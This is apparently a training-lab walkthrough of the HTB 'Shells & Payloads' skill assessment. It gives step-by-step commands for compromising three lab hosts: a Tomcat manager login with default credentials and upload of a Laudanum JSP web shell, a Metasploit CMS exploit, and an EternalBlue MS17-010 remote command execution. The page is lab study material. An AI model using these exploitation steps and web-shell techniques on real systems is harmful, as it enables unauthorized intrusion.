> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/live-assessment.md).

# Live assessment

## HTB: Shells & Payload Skill Assessment

Objective: Validate recon data, research exposed services, and compromise three internal targets originating from a provided Foothold PC. Network Scope: `172.16.0.0/23`

### Phase 0: Infrastructure Preparation

Since all attacks must originate from the Foothold PC, we first need to establish a stable connection and set up our workspace.

1\. Initialize RDP Connection

```bash
xfreerdp /v:<Foothold_PC_IP> /u:htb-student /p:HTB_@cademy_stdnt!
```

2\. Establish SSH (For better terminal stability) Run this inside the RDP session to start the SSH service:

```bash
systemctl start ssh
```

Then, connect from your local host

```bash
ssh htb-student@<Foothold_PC_IP>
```

3\. Prepare Workspace

Bash

```bash
mkdir offsec
cd offsec
```

### Target 1: Windows Server (Tomcat)

IP: `172.16.1.11` | Vector: Apache Tomcat WAR Upload

#### Enumeration

First, we run Nmap to identify services and the hostname.

```bash
nmap -oN host1_initial_enum 172.16.1.11
nmap -oN host1_services_enum -sC -sV -p 80,135,139,445,515 172.16.1.11
```

> Results: Hostname is `shells-winsrvr`. Port 8080 is running Apache Tomcat/10.0.11.

#### Exploitation

Navigating to `http://172.16.1.11:8080/manager/html` prompts for credentials. Using default credential OSINT (GitHub), we gained access with:

* Username: `tomcat`
* Password: `Tomcatadm`

Crafting the Payload (Laudanum): We prepare a JSP web shell using the Laudanum framework.

```bash
cd /usr/share/laudanum/jsp/warfiles
sudo nano cmd.jsp
```

*Note: Edit the `allowedIPs` array in `cmd.jsp` to include the Foothold PC's internal IP (`172.16.x.x`) to bypass the local-only restriction.*

Compiling the WAR File:

```bash
sudo apt-get install default-jdk
sudo ./makewar.sh
```

Deployment & Execution: Transfer the compiled `.war` file to the foothold:

```bash
scp ./cmd.war htb-student@<Foothold_PC_IP>:/home/htb-student/
```

1. Upload `cmd.war` via the Tomcat Manager GUI.
2. The WAR unpacks like a ZIP file. Access the shell at: `http://172.16.1.11:8080/cmd/warfiles/cmd.jsp`

> Flag / Answer: Exploring the C:\ drive reveals the target folder is `dev-share`.

### Target 2: Ubuntu Server (Blog)

IP: `172.16.1.12` | Vector: Vulnerable Web Application / Metasploit

#### Enumeration

Checking `/etc/hosts` on the Foothold PC reveals the IP for `blog.inlanefreight.local` is `172.16.1.12`.

```bash
nmap -oN host2_services_enum -sC -sV -p 80,22 172.16.1.12
```

> Results: OS is Ubuntu. Web server is running a CMS vulnerable to Metasploit module `50064.rb`.

#### Exploitation

Launch Metasploit and configure the specific exploit module.

```bash
msfconsole 
use 50064.rb
```

Configure Payload Options:

```bash
set rhost 172.16.1.12
set rport 80
set username admin
set password admin123!@#
set vhost blog.inlanefreight.local
exploit
```

> Note: The script executes successfully and reveals the payload uses PHP.

Retrieving the Flag: Drop into the system shell from meterpreter and read the flag.

```bash
shell
cat /customscripts/flag.txt
```

### Target 3: Windows Server (EternalBlue)

IP: `172.16.1.13` | Vector: MS17-010 (SMB)

#### Enumeration

```bash
nmap -oN host3_initial_enum 172.16.1.13
nmap -oN host3_services_enum -sC -sV -p 80,135,139,445 172.16.1.13
```

> Results: Hostname is `SHELLS-WINBLUE`. The server is running vulnerable SMB services.

#### Exploitation

While an IIS `upload.aspx` vector exists, grabbing the flag from the Administrator's desktop requires `NT AUTHORITY\SYSTEM` privileges. We pivot directly to EternalBlue for immediate RCE.

```bash
msfconsole
search eternalblue
```

*Select the Remote Command Execution module (usually option 2 in the search results).*

Configure Payload Options:

```bash
set rhost 172.16.1.13
set rport 445
set command type "C:\Users\Administrator\Desktop\Skills-flag.txt"
exploit
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/live-assessment.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
